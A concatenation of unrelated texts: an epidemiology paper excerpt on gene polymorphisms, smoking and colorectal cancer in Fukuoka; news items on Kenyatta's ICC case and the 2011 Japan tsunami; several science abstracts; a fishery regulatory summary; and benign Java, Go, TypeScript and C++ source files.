inhibiting the DNA adduct formation although NQO1 can act as pro-oxidant in certain conditions. The functional 609C>T polymorphism (rs 1800566) causing amino acid change (Pro187Ser) results in loss of NQO1 activity, and may increase susceptibility to the risk of cancer, especially of tobacco-related cancers. A meta-analysis suggested an increased susceptibility to colorectal cancer as well as lung and bladder cancers associated with NQO1 187Ser allele, although the results from individual studies were heterogeneous. Previously, several studies have addressed the interaction between cigarette smoking and one or more of these polymorphisms on colorectal cancer risk [19,20,, and some suggested an interaction between GSTT1 or GSTM1 null genotype and cigarette smoking and between CYP1A1*2A or CYP1A1*2C and cigarette smoking. Few studies have addressed the gene-gene interaction between phase I and II enzymes in relation to colorectal carcinogenesis. In the present study, we examined the relation of CYP1A1, GSTM1, GSTT1 and NQO1 polymorphisms as well as of cigarette smoking to colorectal cancer risk in the Fukuoka Colorectal Cancer Study, a community-based case-control study, focusing on the interaction with cigarette smoking and gene-gene interaction. This is the first study regarding combined genotypes of phase I and II enzymes and colorectal cancer risk in Japan. Methods The Fukuoka Colorectal Cancer Study is a case-control study of incident cases and community controls in Fukuoka City and three adjacent areas. Details of methodological issues have been described elsewhere. The study protocol was approved by the ethics committees of the Kyushu University, Faculty of Medical Sciences and of all except two of the participating hospitals. The two hospitals had no ethics committees at the time of survey, and approval was obtained from the director of each hospital. Subjects Cases were a consecutive series of patients with histologically confirmed incident colorectal adenocarcinoma who were admitted to one of the participating hospitals (two university hospitals and six affiliated hospitals) for surgical treatment during the period September 2000 to December 2003. Eligible cases were Japanese men and women aged 20 to 74 years at time of diagnosis; lived in the study area; had no prior history of partial or total removal of the colorectum, familial adenomatous polyposis, or inflammatory bowel disease; and were mentally competent to give informed consent and to complete the interview. Of the total 1,053 eligible cases, 840 (80%) cases participated in the interview, and 685 gave informed consent for the genotyping. Controls were randomly selected from the study area by frequency-matching with respect to gender and 10year age group. Eligibility criteria for controls were the same as described for the cases except that they had no prior diagnosis of colorectal cancer. A total of 1,500 persons were selected as control candidates by a two-stage random sampling, using residential registry. They were invited to participate in the study by mail. Of these, 833 persons participated in the survey, and 778 gave an informed consent for the genotyping. The participation rate for the interview was calculated as 60% (833 of 1,382), after exclusion of 118 persons for the following reasons: death (n = 7), migration from the study area (n = 22), undelivered mail (n = 44), mental incompetence (n = 19), history of partial or total removal of the colorectum (n = 21) and diagnosis of colorectal cancer after the survey (n = 5). Interview Research nurses interviewed cases and controls in person regarding smoking, alcohol intake, physical activity and other factors using a uniform questionnaire. Interviews for cases were conducted in hospital during admission, and those for controls were conducted mostly at public community centers or collaborating clinics. The referent time for cases was the date of the onset of symptoms or the screening, and that for controls was the time of interview. Detailed information on smoking history was ascertained by asking individuals firstly whether they had ever smoked cigarettes daily for one year or longer. Age of starting smoking and that of quitting smoking (for past smokers) were ascertained, along with years of smoking and numbers of cigarettes smoked per day for each decade of age from the second to eighth decade. Cumulative exposure to cigarette smoking until the beginning of the previous decade of age was expressed by cigaretteyears, the number of cigarettes smoked per day multiplied by years of smoking, and classified into 0, 1-399, 400-799 and >800 cigarette-years. Alcohol consumption at the time of five years prior to the referent time was elicited. The amount of alcohol was expressed in the conventional unit; one go (180 mL) of sake, one large bottle (633 mL) of beer and half a go (90 mL) of shochu were each expressed as one unit; and one drink (30 mL) of whisky or brandy and one glass (100 mL) of wine were each converted to a half unit. Questions on physical activities elicited type of job (sedentary or standing work, work with walking, labor walk, hard labor work and no job), activities in commuting and housework, together with leisure-time activities at the time five years previously. As described in detail previously, leisuretime physical activity (including activities in commuting and housework) was expressed as a sum of metabolic equivalents (MET) multiplied by hours of weekly participation in each activity. Height (cm), recent body weight and body weight at the time 10 years before were elicited. Body mass index (kg/ m 2 ) 10 years earlier was used because the current body mass index was unrelated to risk. Body weight 10 years earlier was not ascertained from 2 cases and 10 controls and was substituted with the current body weight. Gene-gene and gene-environment (smoking) interactions were statistically evaluated based on the likelihood test, comparing the model including a term or terms for interaction and the model without. Deviation from the Hardy-Weinberg equilibrium was evaluated by chisquare test with 1 degree of freedom. Statistical significance was declared if a two-sided P-value was less than 0.05. Statistical analyses were carried out using SAS version 9.2 (SAS Institute, Cary, NC). Table 1 shows the association between cigarette smoking and colorectal cancer risk. Adjustment for the covariates did not markedly change the results. As compared with lifelong nonsmokers, men and women with a light exposure to cigarette smoking (1-399 cigarette-years) showed a moderate decrease in the OR of colorectal cancer. The decreases in the OR in both sexes combined and in women were statistically significant. The ORs for higher categories of smoking were slightly greater than unity in both men and women, but the increases were not statistically significant. In men and women combined, the multivariate-adjusted ORs for past and current smokers as compared with lifelong nonsmokers were 0.90 (95% CI 0.66-1.24) and 0.80 (95% CI 0.58-1.05), respectively. There was no clear association between cumulative years of smoking and colorectal cancer; the multivariate- None of the five polymorphisms showed a measurable association with the risk of colorectal cancer, nor did the composite genotype of GSTM1 and GSTT1 (Table 2). Each polymorphism was not associated with smoking history (cigarette-years) in either men or women among controls (data not shown). Frequencies of CYP1A1*2A allele were 0.363 in cases and 0.372 in controls, and frequencies of CYP1A1*2C allele were 0.221 in cases and 0.230 in controls. Frequencies of the 187Ser allele of NQO1 polymorphism were 0.376 in cases and 0.385 in controls. Genotype distributions of these three polymorphisms were in accordance with the Hardy-Weinberg equilibrium within each cases and controls (all P >0.05). CYP1A1*2A and CYP1A1*2C polymorphisms were in complete linkage disequilibrium. Results There was no material interaction between cigarette smoking and each polymorphism on colorectal cancer risk (Table 3). Repeated analyses for men and for colon and rectal cancers did not show any measurable interaction between smoking and genotype. We further examined gene-gene interactions for the combination of CYP1A1 and GST polymorphisms (Table 4) and CYP1A1 and NQO1 polymorphisms ( Table 5). The combination of CYP1A1*2A or CYP1A1*2C and GSTT1 polymorphisms showed a nearly statistically significant or significant interaction. The composite genotype of GSTT1 non-null and CYP1A1*2A or CYP1A1*2C allele was associated with a decreased risk of colorectal cancer (Table 4). There was no measurable interaction between CYP1A1 and NQO1 polymorphisms in relation to colorectal cancer risk (Table 5). Decreased risks for the combination of CYP1A1 variant allele and GSTT1 non-null genotype were observed only in men; the multivariateadjusted ORs were 0.62 (95% CI 0.42-0.90) for the combination of CYP1A1*2A allele and GSTT1 non-null genotype (P interaction = 0.04) and 0.63 (95% CI 0.43-0.91) for that of CYP1A1*2C allele and GSTT1 non-null genotype (P interaction = 0.07). Cigarette smoking showed no effect modification on associations with composite genotypes of CYP1A1 and GST or NQO1 polymorphisms. For example, the decreased risk among individuals harboring CYP1A1*2A or CYP1A1*2C allele and GSTT1 non-null genotype was observed regardless of exposure to smoking. In other words, high exposure to smoking was consistently related to an increased risk of colorectal cancer across different composite genotypes (see additional file 1). Discussion Many studies have addressed the association between cigarette smoking and colorectal cancer risk, and their findings are highly variable although an 18% increase in colorectal cancer risk was estimated for ever-smokers versus never-smokers in a recent meta-analysis. The variable results may be due to differences in study method, statistical power and ethnicity. The association may differ by sex or location of colorectal cancer. In fact, prospective studies showed higher risk estimates than case-control studies in the meta-analysis. Furthermore, while an increased risk associated with smoking was observed in both men and women, the positive association with smoking was more evident for rectal cancer than for colon cancer. The present finding adds to evidence that cigarette smoking is associated with increased risk of rectal cancer. It was unexpected that individuals with an exposure of 1-399 cigarette-years had a decreased risk of colorectal cancer. This decrease was observed for colon cancer but not for rectal cancer, and was more marked in women. Previously, some case-control studies also suggested that smoking was associated with a decreased risk of distal colon cancer in Caucasians and of colon cancer in Japanese. We have no clear explanation to the decreased risk of colon cancer associated with light smoking although confounding remains a possible explanation. In agreement with the results from three studies, the present study did not show an association of either CYP1A1*2A or CYP1A1*2C polymorphism with colorectal cancer risk. An 8-fold increased risk of colorectal cancer among Japanese homozygotes of CYP1A1*2A allele in Hawaii is probably a chance finding due to small numbers (23 cases and 59 controls). Of these previous studies, two examined the interaction between CYP1A1 polymorphisms and smoking. One study reported an increased risk of rectal cancer, but not of colon cancer, among former and current smokers who did not carry either CYP1A1*2A or CYP1A1*2C allele, while the other study showed no interaction between either of the CYP1A1 polymorphisms and smoking on colorectal cancer risk. The GSTM1 and GSTT1 polymorphisms were unrelated to colorectal cancer risk singly or in combination in the present study. GSTM1 null genotype was associated with a small, statistically significant increase in the risk of colorectal cancer in some case-control studies, but not in several other studies [20,. Likewise, the previous findings on GSTT1 null genotype and colorectal cancer are inconsistent. A meta-analysis based on 11 studies reported a small increase in colorectal cancer risk associated with GSTT1 null genotype, but the results of these studies were highly heterogeneous. Most of the previous studies found no increase in the risk of colorectal cancer in individuals with the combined null genotype of GSTM1 and GSTT1. On the other hand, a 5fold increased risk of colorectal cancer was reported for simultaneous carriers of both GSTM1 and GSTT1 null genotypes in a study of 144 cases and 329 healthy con- trols in Spain. In that study, GSTM1 and GSTT1 null genotypes were also statistically significantly associated with 1.9-fold and 3.6-fold increased risks, respectively. Frequencies of GSTM1 and GSTT1 null genotypes vary with different populations, but the difference in genotype distribution does not seem to explain the different results. The combined null genotype of GSTM1 and GSTT1 accounted for 24% among controls in the present study and for 7% in the Spanish study. The statistical power was obviously greater in the present study than in the Spanish study. At least six case-control studies have examined the relation between NQO1 Pro187Ser polymorphism and colorectal cancer, and only one study, which included 371 cases and 415 healthy controls in the Netherlands, showed a statistically significant increase in the risk associated with the variant 187Ser allele. On the other hand, homozygotes of the NQO1 187Ser allele was associated with a 2-fold increase in the prevalence odds of colorectal adenomas in the United States. In that study, individuals having both CYP1A1*2C and NQO1 187Ser variant alleles showed a significantly increased risk, particularly among heavy smokers. The present findings showed neither an increased risk of colorectal cancer in relation to the composite of CYP1A1 variant allele and NQO1 187Ser alleles nor an interaction between the composite genotypes and smoking. A unique finding in the present study is that CYP1A1*2A or CYP1A1*2C allele was associated with a decreased risk only in individuals with GSTT1 non-null genotype. Interpretation of these findings is rather difficult, particularly because the association was confined to men. Available evidence suggests at least a secondary role of the CYP1A1 polymorphisms for increased risks of smoking-related cancers although the association between these polymorphisms and enzyme activity or property remains controversial. Two case-controls studies of smaller sizes previously examined the combined effect of CYP1A1*2C and either GSTM1 or GSTT1 null genotype, showing no interaction between the two. The present findings on CYP1A1 and GSTT1 polymorphisms in combination may be due to chance, and need to be consolidated in further studies. The use of community controls, the large number of subjects, and ethnic homogeneity of the study population were strengths of the present study. The statistical powers were fairly large except for CYP1A1*2C polymorphism. The powers of detecting an OR of 1.5 for variant homozygotes compared with wild homozygotes (two-sided = 0.05) were 0.71 for CYP1A1*2A, 0.42 for CYP1A1*2C and 0.69 for NQO1, and the corresponding values for null ver-sus non-null genotype were 0.96 for GSTM1 and 0.93 for GSTT1. There were several limitations to be discussed. The participation in the interview was not as high in the controls (60%) as in the cases (80%). We had no information as to the difference between participant and nonparticipant controls with respect to smoking history. The overall participation for genotyping was rather low (65% in cases and 56% in controls). Although older persons and women were less likely to give consent for the genotyping, there was no difference between those who gave consent and those who did not in terms of smoking, residence area, and alcohol use. A retrospective assessment of cumulative exposure to cigarette smoking is subject to inaccuracy, and may have been biased because interviewers had known case-control status. Lifestyle factors were assessed for different time periods in the past for ease of recalling. This may have caused inaccuracy to different extents for the covariates, leaving different magnitudes of residual confounding. It is known that GSTM1 and GSTT1 genes contain nonsynonymous SNPs which may modify the enzyme activity, but these SNPs seem to be of little relevance in Asians as well as Caucasians. Finally, although cases with familial adenomatous polyposis were not included, other hereditary colorectal cancers were not specifically ascertained in the present study. However, in the analysis excluding 16 cases and 40 controls aged <40 years, the results were essentially the same as those described above. Conclusions The present study showed a moderately decreased risk of colorectal cancer, especially of colon cancer, in individuals with a light exposure to cigarette-smoking. A high exposure to cigarette smoking was associated with an increased risk of rectal cancer. None of the genetic polymorphisms relevant to the metabolism of tobacco carcinogens showed a measurable association with the risk of colorectal cancer. The observed interactions between CYP1A1 and GSTT1 polymorphisms warrant further investigation.
/* * File : ExtractCoincidences.java * Created : 02-Mar-2009 * By : atrilla * * Emolib - Emotional Library * * Copyright (c) 2009 <NAME> & * 2007-2012 Enginyeria i Arquitectura La Salle (Universitat Ramon Llull) * * This file is part of Emolib. * * You should have received a copy of the rights granted with this * distribution of EmoLib. See COPYING. */ package emolib.util.eval.semeval; import java.io.*; /** * The <i>ExtractCoincidences</i> class checks the coincidences between the * two input emotion tag categorisations and creates one file with these * matches, another file with the predictions produced by EmoLib and a file * containing the original sentences for further study (relation with its * dimensions). * * <p> * In case a quick reference of its usage is needed, the class responds to the * typical help queries ("-h" or "--help") by showing the program's synopsis. * </p> * * @author <NAME> (<EMAIL>) */ public class ExtractCoincidences { /** * Void constructor. */ public ExtractCoincidences() { } /** * Prints the synopsis. */ public void printSynopsis() { System.out.println("ExtractCoincidences usage:"); System.out.println("\tjava -cp EmoLib-X.Y.Z.jar emolib.util.eval.semeval.ExtractCoincidences " + "FILE_CATEGORIES_1 FILE_CATEGORIES_2 PREDICTIONS_FILE SENTENCES_FILE OUTPUT_FOLDER"); } /** * The main method of the ExtractCoincidences application. * * @param args The input arguments. The first one corresponds to the first input categories file, * followed by the second input categories file, * followed by the predictions file produced by EmoLib and finally, as * the fourth parameter, the desired output folder. */ public static void main(String[] args) throws Exception { ExtractCoincidences theExtractor = new ExtractCoincidences(); if (args.length == 5) { BufferedReader categoriesFileOne = new BufferedReader(new FileReader(args[0])); BufferedReader categoriesFileTwo = new BufferedReader(new FileReader(args[1])); BufferedReader predictionFile = new BufferedReader(new FileReader(args[2])); BufferedReader sentencesFile = new BufferedReader(new FileReader(args[3])); BufferedWriter outputCategoriesFile = new BufferedWriter(new FileWriter(args[4] + System.getProperty("file.separator") + "semeval_categories.txt")); BufferedWriter outputPredictionsFile = new BufferedWriter(new FileWriter(args[4] + System.getProperty("file.separator") + "emolib_predictions.txt")); BufferedWriter outputSentencesFile = new BufferedWriter(new FileWriter(args[4] + System.getProperty("file.separator") + "semeval_sentences.txt")); String lineCategoriesFileOne = categoriesFileOne.readLine(); String lineCategoriesFileTwo = categoriesFileTwo.readLine(); String linePredictionFile = predictionFile.readLine(); String lineSentencesFile = sentencesFile.readLine(); while ((lineCategoriesFileOne != null) && (lineCategoriesFileTwo != null) && (linePredictionFile != null) && (lineSentencesFile != null)) { if (lineCategoriesFileOne.trim().equals(lineCategoriesFileTwo.trim())) { outputCategoriesFile.write(lineCategoriesFileOne.trim()); outputCategoriesFile.newLine(); outputPredictionsFile.write(linePredictionFile.trim()); outputPredictionsFile.newLine(); outputSentencesFile.write(lineSentencesFile.trim()); outputSentencesFile.newLine(); } lineCategoriesFileOne = categoriesFileOne.readLine(); lineCategoriesFileTwo = categoriesFileTwo.readLine(); linePredictionFile = predictionFile.readLine(); lineSentencesFile = sentencesFile.readLine(); } outputCategoriesFile.close(); outputPredictionsFile.close(); outputSentencesFile.close(); } else if (args.length == 1) { if (args[0].equals("-h") || args[0].equals("--help")) { theExtractor.printSynopsis(); } else { System.out.println("ExtractCoincidences: Please enter the correct parameters!"); System.out.println(""); theExtractor.printSynopsis(); } } else { System.out.println("ExtractCoincidences: Please enter the correct parameters!"); System.out.println(""); theExtractor.printSynopsis(); } } }
Kenyan President Uhuru Kenyatta says he's ''very excited'' that ''crimes against humanity'' charges against him have been dropped by the ICC and hopes similar cases against his deputy will also be dismissed. Jennifer Davis reports. (SOUNDBITE) (English) KENYAN FOREIGN AFFAIRS CABINET SECRETARY, AMINA MOHAMED, SAYING: "Today at The Hague, the prosecutor has dismissed the charges against his Excellency the president..." From healthy applause to celebrations in the streets - Kenyans reacted to the news that the International Criminal Court in the Hague has withdrawn charges of crimes against humanity against Kenyan President Uhuru Kenyatta. (SOUNDBITE)(English) KENYAN PRESIDENT UHURU KENYATTA, SAYING: "I am very keen to run home to my wife right now and tell her what's happening - anyway I am very excited by the way." Prosecutors say Kenyatta, who had been accused of orchestrating a wave of deadly violence after Kenya's 2007 elections, used his political power to obstruct their investigation, especially since becoming president last year. Kenyatta's lawyers rejected the accusations. The court did not acquit Kenyatta of the charges, as his lawyers had requested so charges could be brought again if more evidence becomes available. Kenyatta says now he wants the case against his deputy dropped too.
Granulocyte-macrophage colony stimulating factor exacerbates collagen induced arthritis in mice OBJECTIVE To examine the effect of granulocyte-macrophage colony stimulating factor (GM-CSF) on disease progression in the collagen induced arthritis (CIA) model in mice. METHODS DBA/1 mice were primed for a suboptimal CIA response by intradermal injection of chick type II collagen without a secondary immunisation. Three weeks after immunisation the mice were given four to five consecutive daily intraperitoneal injections of recombinant murine GM-CSF (15 g; 5 105 U), or vehicle, and arthritis development was monitored by clinical scoring of paws and calliper measurements of footpad swelling. At approximately six to eight weeks after immunisation mice were killed, their limbs removed and processed for histological analyses of joint pathology. RESULTS Control animals receiving a single immunisation with collagen exhibited a varied CIA response both in terms of incidence and severity. Mice treated with GM-CSF at 20 to 25 days after immunisation with collagen had a consistently greater incidence and more rapid onset of disease than the vehicle treated control mice, based on clinical assessment. GM-CSF treated mice showed higher average clinical scores and greater paw swelling than controls. Histological analyses of joints reflected the clinical scores with GM-CSF treated mice displaying more pronounced pathology (synovitis, pannus formation, cartilage and bone damage) than control mice. CONCLUSION GM-CSF is a potent accelerator of the pathological events leading to chronic inflammatory polyarthritis in murine CIA supporting the notion that GM-CSF may play a part in inflammatory polyarthritis, such as rheumatoid arthritis.
<gh_stars>100-1000 package com.yisu.springboot; import org.springframework.boot.SpringApplication; import org.springframework.boot.autoconfigure.SpringBootApplication; /** * groovy 测试 * @author xuyisu * @date 2021/11/12 */ @SpringBootApplication public class FwGroovyApplication { public static void main(String[] args) { SpringApplication.run(FwGroovyApplication.class, args); } }
/** * @typedef {import('./types').HTTPClientExtraOptions} HTTPClientExtraOptions * @typedef {import('ipfs-core-types/src/root').API<HTTPClientExtraOptions>} RootAPI */ export const createResolve: import("./lib/configure.js").Factory<(path: string, options?: (import("ipfs-core-types/src/root").ResolveOptions & import("./types").HTTPClientExtraOptions) | undefined) => Promise<string>>; export type HTTPClientExtraOptions = import('./types').HTTPClientExtraOptions; export type RootAPI = import('ipfs-core-types/src/root').API<HTTPClientExtraOptions>; //# sourceMappingURL=resolve.d.ts.map
<reponame>Kamilcuk/Anthill #ifndef SERIALIZATION_H #define SERIALIZATION_H /** * Headers for all boost::serialization functionalities used in project. */ #include <boost/archive/text_oarchive.hpp> #include <boost/archive/text_iarchive.hpp> #include <boost/serialization/export.hpp> #include <boost/serialization/base_object.hpp> #include <boost/serialization/binary_object.hpp> #include <boost/serialization/vector.hpp> #include <boost/serialization/shared_ptr.hpp> #include <boost/serialization/weak_ptr.hpp> #endif // SERIALIZATION_H
Some 10,000 people are unaccounted for in the town of Minami Sanriku, which has been buried under mud [Al Jazeera] Rescuers are recovering bodies and searching for survivors along Japan's northeastern coastline, as millions of survivors are left without drinking water, electricity and proper food in the wake of a devastating earthquake and tsunami. The death toll from Friday's twin disasters will probably exceed 10,000 in Miyagi prefecture alone, Naoto Takeuchi, the local police chief, said on Sunday as hundreds of bodies were recovered. Naoto Kan, Japan's prime minister, said the crisis was the worst disaster the country had faced since the second world war. LIVE BLOG But in one astonishing rescue, a military helicopter on Sunday picked up a 60-year-old man floating off the coast of Fukushima on the roof of his house after being swept 15km out to sea by the tsunami, the defence ministry said. "I ran away after learning that the tsunami was coming," Hiromitsu Shinkawa told rescuers according to Jiji Press. "But I turned back to pick up something at home, when I was washed away. I was rescued while I was hanging to the roof of my house." Dislodged shipping containers piled up along the coastline and swathes of mangled wreckage consumed what used to be rice fields. An elderly woman wrapped in a blanket tearfully recalled how she and her husband evacuated from Kesennuma town, north of Miyagi prefecture, where the massive tsunami swept through a fishing port. "I was trying to escape with my husband, but water forced us to run up to the second story of a house of people we don't even know at all," she told NHK television. "Water still came up to the second floor, and before our eyes, the house's owner and his daughter were flushed away. We couldn't do anything. Nothing." Water shortages The quake, measured to magnitude 9.0 by the Japanese Meteorological Agency, was the strongest quake ever recorded in the country. It has been followed by more than 150 powerful aftershocks. At least 1.4 million households have gone without water since the quake struck and millions of households are without electricity. Temperatures were to dip near freezing overnight. Large areas of the countryside remained surrounded by water and unreachable. Many fuel stations were closed and people were running out of petrol for their vehicles. Public broadcaster NHK said around 310,000 people have been evacuated to emergency shelters, many of them without power. In Iwaki town, residents were leaving due to concerns over dwindling food and fuel supplies. The town had no electricity and all stores were closed. As Sendai city endured a pitch-black night amid a power blackout, Masayoshi Yamamoto, the Sendai Teishin Hospital spokesman, told the AFP news agency the building was able to keep its lights on using its own power generators, drawing in survivors. Around 50 people arrived looking to shelter from the cold night air in the lobby of the downtown Sendai city hospital, he said. "Many of them are from outside Miyagi prefecture, who had visited some patients here or came in search of essential medicines," he said. But with water supplies cut, Yamamoto said hospital officials were worried about how long its tank-based supply would last. The hospital may also run out of food for its patients by Monday. "We have asked other hospitals to provide food for us, but transportation itself seems difficult," he said. In Sendai, 24-year-old Ayumi Osuga dug through the destroyed remnants of her home. She had been playing origami, the Japanese art of folding paper into figures, with her three children when the quake stuck. She recalled her husband's shouted warning from outside: "Get out of there now!" She gathered her children and fled in her car to higher ground with her husband. They spent the night huddled in a hilltop home belonging to her husband's family about 20km away. "My family, my children. We are lucky to be alive,'' she told the Associated Press. "I have come to realise what is important in life".
<gh_stars>0 /* Copyright SecureKey Technologies Inc. All Rights Reserved. SPDX-License-Identifier: Apache-2.0 */ package context import ( "encoding/json" "fmt" "github.com/hyperledger/aries-framework-go/pkg/didcomm/dispatcher" "github.com/hyperledger/aries-framework-go/pkg/didcomm/transport" "github.com/hyperledger/aries-framework-go/pkg/framework/aries/api" "github.com/hyperledger/aries-framework-go/pkg/wallet" ) // Provider supplies the framework configuration to client objects. type Provider struct { outboundTransport transport.OutboundTransport services []dispatcher.Service wallet wallet.Wallet } // New instantiated new context provider func New(opts ...ProviderOption) (*Provider, error) { ctxProvider := Provider{} for _, opt := range opts { err := opt(&ctxProvider) if err != nil { return nil, fmt.Errorf("option failed: %w", err) } } return &ctxProvider, nil } // OutboundTransport returns the outbound transport provider func (p *Provider) OutboundTransport() transport.OutboundTransport { return p.outboundTransport } // Service return protocol service func (p *Provider) Service(id string) (interface{}, error) { for _, v := range p.services { if v.Name() == id { return v, nil } } return nil, api.ErrSvcNotFound } // CryptoWallet returns the crypto wallet service func (p *Provider) CryptoWallet() wallet.Crypto { return p.wallet } // InboundMessageHandler return inbound message handler func (p *Provider) InboundMessageHandler() transport.InboundMessageHandler { return func(payload []byte) error { // get the message type from the payload and dispatch based on the services msgType := &struct { Type string `json:"@type,omitempty"` }{} err := json.Unmarshal(payload, msgType) if err != nil { return fmt.Errorf("invalid payload data format: %w", err) } // find the service which accepts the message type for _, svc := range p.services { if svc.Accept(msgType.Type) { return svc.Handle(dispatcher.DIDCommMsg{Type: msgType.Type, Payload: payload}) } } return fmt.Errorf("no message handlers found for the message type: %s", msgType.Type) } } // ProviderOption configures the framework. type ProviderOption func(opts *Provider) error // WithOutboundTransport injects transport provider into the framework func WithOutboundTransport(ot transport.OutboundTransport) ProviderOption { return func(opts *Provider) error { opts.outboundTransport = ot return nil } } // WithProtocolServices injects protocol services into the context. func WithProtocolServices(services ...dispatcher.Service) ProviderOption { return func(opts *Provider) error { opts.services = services return nil } } // WithWallet injects a wallet service into the context func WithWallet(w wallet.Wallet) ProviderOption { return func(opts *Provider) error { opts.wallet = w return nil } }
FINAL REGULATORY IMPACT REVIEW / INITIAL REGULATORY FLEXIBILITY ANALYSIS For Amendment 45 to the Fishery Management Plan for This action would remove Gulf of Alaska (GOA) Pacific cod sideboard limits applicable to some freezer longliners if certain conditions are met during a limited period of time. The sideboard limits were originally created by the Crab Rationalization Program and were shared by participants using all gear types in the inshore or offshore groundfish sectors. In 2012, these sideboard limits were disaggregated to create limits based on gear type and operation type, as part of the GOA Pacific cod sector splits (Amendment 83 to the FMP for Gulf of Alaska Groundfish). Given the limited catch history of the sideboarded freezer longline vessels (i.e., using hook-and-line) during the 1996 through 2000 period, the modified sideboard limits eliminated participation in the GOA Pacific cod fisheries by these vessels. This action is intended to promote cooperation among all freezer longline vessels prior to the removal of sideboards.
Waveform and Transceiver Design for Simultaneous Wireless Information and Power Transfer Simultaneous Wireless Information and Power Transfer (SWIPT) has attracted significant attention in the communication community. The problem of waveform design has however never been addressed so far. In this paper, we first investigate how a communication waveform (OFDM) and a power waveform (multisine) compare with each other in terms of harvested energy. We show that due to the non-linearity of the rectifier and the randomness of the information symbols, the OFDM waveform is less efficient than the multisine waveform for wireless power transfer. This observation motivates the design of a novel SWIPT transceiver architecture relying on the superposition of multisine and OFDM waveforms at the transmitter and a power-splitter receiver equipped with an energy harvester and an information decoder. The superposed SWIPT waveform is optimized so as to maximize the rate-energy region of the whole system. Its design is adaptive to the channel state information and result from a posynomial maximization problem that originates from the non-linearity of the energy harvester. Numerical results illustrate the performance of the derived waveforms and SWIPT architecture. Key (and refreshing) observations are that 1) a power waveform (superposed to a communication waveform) is useful to enlarge the rate-energy region of SWIPT, 2) a combination of power splitting and time sharing is in general the best strategy, 3) exploiting the nonlinearity of the rectifier is essential to design efficient SWIPT architecture, 4) a non-zero mean Gaussian input distribution outperforms the conventional capacity-achieving zero-mean Gaussian input distribution.
<filename>vividus-extension-selenium/src/main/java/org/vividus/monitor/AbstractScreenshotOnFailureMonitor.java /* * Copyright 2019-2021 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.vividus.monitor; import java.lang.reflect.AnnotatedElement; import java.lang.reflect.Method; import java.util.List; import java.util.Optional; import com.google.common.eventbus.EventBus; import com.google.common.eventbus.Subscribe; import org.jbehave.core.model.Scenario; import org.jbehave.core.steps.NullStepMonitor; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import org.vividus.context.RunContext; import org.vividus.model.RunningScenario; import org.vividus.model.RunningStory; import org.vividus.reporter.event.AttachmentPublishEvent; import org.vividus.reporter.model.Attachment; import org.vividus.selenium.IWebDriverProvider; import org.vividus.selenium.screenshot.Screenshot; import org.vividus.softassert.event.AssertionFailedEvent; public abstract class AbstractScreenshotOnFailureMonitor extends NullStepMonitor { private static final String NO_SCREENSHOT_ON_FAILURE_META_NAME = "noScreenshotOnFailure"; private static final Logger LOGGER = LoggerFactory.getLogger(AbstractScreenshotOnFailureMonitor.class); private List<String> debugModes; private final ThreadLocal<Boolean> takeScreenshotOnFailureEnabled = ThreadLocal.withInitial(() -> Boolean.FALSE); private final EventBus eventBus; private final RunContext runContext; private final IWebDriverProvider webDriverProvider; public AbstractScreenshotOnFailureMonitor(EventBus eventBus, RunContext runContext, IWebDriverProvider webDriverProvider) { this.eventBus = eventBus; this.runContext = runContext; this.webDriverProvider = webDriverProvider; } @Override public void beforePerforming(String step, boolean dryRun, Method method) { if (takeScreenshotOnFailure(method) && !isStoryHasNoScreenshotOnFailureMeta() && !isScenarioHasNoScreenshotsOnFailureMeta()) { enableScreenshotOnFailure(); } } @Override public void afterPerforming(String step, boolean dryRun, Method method) { if (takeScreenshotOnFailure(method)) { disableScreenshotOnFailure(); } } @Subscribe public void onAssertionFailure(AssertionFailedEvent event) { if (takeScreenshotOnFailureEnabled.get() && webDriverProvider.isWebDriverInitialized()) { try { takeAssertionFailureScreenshot("Assertion_Failure").ifPresent(screenshot -> { Attachment attachment = new Attachment(screenshot.getData(), screenshot.getFileName()); eventBus.post(new AttachmentPublishEvent(attachment)); }); } // CHECKSTYLE:OFF catch (RuntimeException e) { LOGGER.error("Unable to take a screenshot", e); } // CHECKSTYLE:ON } } protected abstract Optional<Screenshot> takeAssertionFailureScreenshot(String screenshotName); private boolean takeScreenshotOnFailure(Method method) { if (method != null) { AnnotatedElement annotatedElement = method.isAnnotationPresent(TakeScreenshotOnFailure.class) ? method : method.getDeclaringClass(); TakeScreenshotOnFailure annotation = annotatedElement.getAnnotation(TakeScreenshotOnFailure.class); if (annotation != null) { String debugModeProperty = annotation.onlyInDebugMode(); return debugModeProperty.isEmpty() || debugModes != null && debugModes.stream().anyMatch(debugModeProperty::equals); } } return false; } private void enableScreenshotOnFailure() { takeScreenshotOnFailureEnabled.set(Boolean.TRUE); } private void disableScreenshotOnFailure() { takeScreenshotOnFailureEnabled.set(Boolean.FALSE); } private boolean isStoryHasNoScreenshotOnFailureMeta() { RunningStory runningStory = runContext.getRunningStory(); return runningStory.getStory().getMeta().hasProperty(NO_SCREENSHOT_ON_FAILURE_META_NAME); } private boolean isScenarioHasNoScreenshotsOnFailureMeta() { return Optional.of(runContext.getRunningStory()) .map(RunningStory::getRunningScenario) .map(RunningScenario::getScenario) .map(Scenario::getMeta) .map(m -> m.hasProperty(NO_SCREENSHOT_ON_FAILURE_META_NAME)).orElse(Boolean.FALSE); } public void setDebugModes(List<String> debugModes) { this.debugModes = debugModes; } }
Effect of fiber content on thermal and mechanical properties of euphorbia coagulum modified polyester and bamboo fiber composite In the present experimental investigation, the utilization of euphorbia coagulum as a binder to fabricate euphorbia coagulum modified polyester bamboo fiber composite using a compression molding technique was studied. Composites were fabricated by varying the concentration of pristine bamboo fiber (BF) as well as alkali-treated bamboo fiber from 25% to 50% and also fabricated by the modification of polyester resin (PR) with euphorbia coagulum (EC). Structural and morphological changes of the fiber before and after alkali treatment were analyzed by XRD, SEM, FTIR, and the fabricated composites were characterized by scanning electron microscopy (SEM), thermogravimetric analysis (TGA) and mechanical properties by universal testing machine (UTM). Alkali treatment removed most of the hemicellulose and lignin content of the fiber which increases the surface roughness of the fiber and the nature of the fiber has been changed from hydrophilic to hydrophobic. It leads to facilitate the interlocking between fiber and matrix resulting in the improvement in mechanical properties of the composites. The maximum improvement in mechanical and thermal properties of composites were observed in case of 40% addition of both the pristine and alkali treated bamboo fiber in the polyester resin 